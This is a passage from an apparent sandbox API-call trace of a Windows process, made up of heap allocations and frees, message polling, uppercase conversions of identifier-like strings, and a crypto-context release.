returned 0x24b17a8 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.902] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.902] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0190.902] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.902] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.903] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.903] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0190.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.903] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0190.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.903] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.903] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0190.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.904] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0190.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.904] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.904] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.904] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.904] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.904] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.905] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.905] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.905] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.905] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.905] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.905] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.906] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.906] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.906] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0190.906] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.906] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.907] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.907] CryptReleaseContext (hProv=0xaa3868, dwFlags=0x0) returned 1 [0190.907] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.907] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.907] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0190.907] FreeLibrary (hLibModule=0x74d40000) returned 1 [0190.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.907] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.909] CloseHandle (hObject=0x268) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.910] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0190.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 